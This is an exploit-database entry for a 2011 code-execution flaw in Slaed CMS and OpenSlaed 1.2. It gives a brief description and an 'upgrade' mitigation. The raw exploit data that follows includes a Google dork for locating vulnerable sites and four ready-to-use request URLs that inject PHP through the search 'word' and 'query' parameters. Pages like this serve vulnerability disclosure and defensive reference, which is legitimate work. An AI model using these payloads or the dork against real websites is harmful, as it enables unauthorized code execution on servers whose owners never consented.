header-logo
Suggest Exploit
vendor:
Slaed CMS
by:
brain[pillow]
9.8
CVSS
HIGH
Code Execution
94
CWE
Product Name: Slaed CMS
Affected Version From: OpenSlaed 1.2 (free), Slaed CMS <= 4.*
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:slaed:slaed_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Slaed CMS Code exec

A code execution vulnerability exists in Slaed CMS versions 4.* and OpenSlaed 1.2 (free). An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious PHP code to the vulnerable server. The malicious code is executed in the context of the web server process.

Mitigation:

Upgrade to the latest version of Slaed CMS.
Source

Exploit-DB raw data:

# Exploit Title: Slaed CMS Code exec
# Google Dork: "Powered by SLAED CMS"
# Date: 03.05.2011
# Author: brain[pillow]
# Software Link: http://slaed.net/
# Version: OpenSlaed 1.2 (free), Slaed CMS <= 4.*

On different versions of this software next vulnerabilities are availible:

/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view
/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view

OR:

/search.html?mod=&word={${phpinfo()}}&query=ok&to=view
/search.html?mod=&word=ok&query={${phpinfo()}}&to=view

Navigation

Suggest Exploit

Services By CQR